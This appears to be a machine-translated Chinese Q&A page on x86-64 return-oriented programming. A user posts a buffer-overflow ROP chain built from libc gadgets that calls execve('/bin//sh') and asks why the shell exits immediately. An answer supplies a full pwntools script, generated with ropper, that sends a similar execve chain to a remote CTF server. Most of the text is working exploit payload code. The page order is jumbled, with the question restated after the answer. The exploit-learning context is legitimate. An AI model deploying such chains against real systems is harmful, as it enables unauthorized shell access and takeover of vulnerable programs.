Question

我具有下面的execv shell ROP小工具。

from struct import pack
p = "\x90"+"a"*71
p += pack('<Q', 0x0000000000001b96+0x007ffff79e4000) # pop rdx ; ret
p += pack('<Q', 0x00000000003eb1a0+0x007ffff79e4000) # @ .data
p += pack('<Q', 0x00000000000439c8+0x007ffff79e4000) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000003093c+0x007ffff79e4000) # mov qword ptr [rdx], rax ; ret
p += pack('<Q', 0x0000000000001b96+0x007ffff79e4000) # pop rdx ; ret
p += pack('<Q', 0x00000000003eb1a8+0x007ffff79e4000) # @ .data + 8
p += pack('<Q', 0x00000000000b17c5+0x007ffff79e4000) # xor rax, rax ; ret
p += pack('<Q', 0x000000000003093c+0x007ffff79e4000) # mov qword ptr [rdx], rax ; ret
p += pack('<Q', 0x000000000002155f+0x007ffff79e4000) # pop rdi ; ret
p += pack('<Q', 0x00000000003eb1a0+0x007ffff79e4000) # @ .data
p += pack('<Q', 0x0000000000023e6a+0x007ffff79e4000) # pop rsi ; ret
p += pack('<Q', 0x00000000003eb1a8+0x007ffff79e4000) # @ .data + 8
p += pack('<Q', 0x0000000000001b96+0x007ffff79e4000) # pop rdx ; ret
p += pack('<Q', 0x00000000003eb1a8+0x007ffff79e4000) # @ .data + 8
p += pack('<Q', 0x00000000000b17c5+0x007ffff79e4000) # xor rax, rax ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000013c0+0x007ffff79e4000) # syscall

print(p)

程序运行并成功退出。但是不会提示任何shell。从GDB运行时，我收到以下消息。 ''' 进程3928正在执行新程序：/ bin / dash [下级1（过程3928）正常退出] '''

我检查进程是否正在执行Shell，并且能够在程序调试期间看到进程“ sh”正在运行。 Bu最后以某种方式终止。从终端运行时，我没有任何进程退出消息。我需要通过溢出缓冲区来启动Shell。 PS：我禁用了ASLR。

Answer 1

您可以与pwntools结合使用，这是我为解决CTF挑战而编写的示例利用脚本：

#!/usr/bin/env python
# Generated by ropper ropchain generator #
from pwn import *
from struct import pack

s = remote("hack.bckdr.in", "15102")
#s = process("qemu-x86_64 ./chall2")
p = lambda x : pack('Q', x)

IMAGE_BASE_0 = 0x0000000000400000 # 4a6888bf50a5cfc75ea51ec172dfee08ef6d82e3a9fdbea556ef9cd86dd51c6a
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x0000000000001a1f) # 0x0000000000401a1f: pop r13; ret; 
rop += '//bin/sh'
rop += rebase_0(0x00000000000016c3) # 0x00000000004016c3: pop rdi; ret; 
rop += rebase_0(0x00000000002c0060)
rop += rebase_0(0x0000000000050c95) # 0x0000000000450c95: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x0000000000001a1f) # 0x0000000000401a1f: pop r13; ret; 
rop += p(0x0000000000000000)
rop += rebase_0(0x00000000000016c3) # 0x00000000004016c3: pop rdi; ret; 
rop += rebase_0(0x00000000002c0068)
rop += rebase_0(0x0000000000050c95) # 0x0000000000450c95: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x00000000000016c3) # 0x00000000004016c3: pop rdi; ret; 
rop += rebase_0(0x00000000002c0060)
rop += rebase_0(0x00000000000017d7) # 0x00000000004017d7: pop rsi; ret; 
rop += rebase_0(0x00000000002c0068)
rop += rebase_0(0x00000000000377d5) # 0x00000000004377d5: pop rdx; ret; 
rop += rebase_0(0x00000000002c0068)
rop += rebase_0(0x000000000006b9f8) # 0x000000000046b9f8: pop rax; ret; 
rop += p(0x000000000000003b)
rop += rebase_0(0x000000000005bac5) # 0x000000000045bac5: syscall; ret; 
#print rop

payload = "A" * 40 + rop + "\n"

s.sendline(payload)
#s.interactive() # or with interactive ?

如何制作ROP小工具以使Shell正常工作？

1 个答案: